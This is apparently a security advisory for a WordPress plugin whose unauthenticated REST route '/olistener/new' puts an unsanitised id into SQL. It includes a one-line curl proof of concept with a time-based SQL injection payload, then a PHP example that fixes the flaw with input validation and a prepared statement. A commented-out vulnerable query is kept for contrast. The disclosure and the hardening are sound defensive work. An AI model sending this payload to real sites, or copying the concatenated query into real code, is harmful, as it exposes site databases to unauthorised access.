The plugin does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.
curl 'http://example.com/?rest_route=/olistener/new' --data '{"id":" (SELECT SLEEP(3))#"}' -H 'content-type: application/json'
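
A plugin-side fix for this class of bug, as an added example and not the plugin's own code: the id argument is validated when the route is registered and bound through $wpdb->prepare() in the handler. The handler name, table name and query shape are assumptions; only the route and the id parameter come from the advisory.

```php
<?php
// Added illustration, not the plugin's source.
// example_olistener_new() and the example_orders table are hypothetical names.

add_action( 'rest_api_init', function () {
    register_rest_route( 'olistener', '/new', array(
        'methods'             => 'POST',
        'callback'            => 'example_olistener_new',
        // The route stays reachable without authentication, as in the advisory;
        // the fix shown here is about how id reaches the database.
        'permission_callback' => '__return_true',
        'args'                => array(
            'id' => array(
                'required'          => true,
                // Accept only a plain run of digits; anything else is
                // rejected by the REST server before the callback runs.
                'validate_callback' => function ( $value ) {
                    return is_scalar( $value ) && ctype_digit( (string) $value );
                },
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
} );

function example_olistener_new( WP_REST_Request $request ) {
    global $wpdb;

    $table = $wpdb->prefix . 'example_orders'; // hypothetical table name
    $id    = $request->get_param( 'id' );

    // Vulnerable pattern of the kind the advisory describes (assumed shape):
    // the request value is concatenated straight into the statement.
    //   $row = $wpdb->get_row( "SELECT * FROM {$table} WHERE id = {$id}" );

    // Hardened: the value is bound through a typed placeholder, so it can
    // only ever be interpreted as an integer, never as SQL syntax.
    $row = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id )
    );

    if ( null === $row ) {
        return new WP_Error( 'example_not_found', 'No such record.', array( 'status' => 404 ) );
    }

    return rest_ensure_response( $row );
}
```

With this validation in place, the request shown above is rejected with an HTTP 400 response because the id value is not numeric.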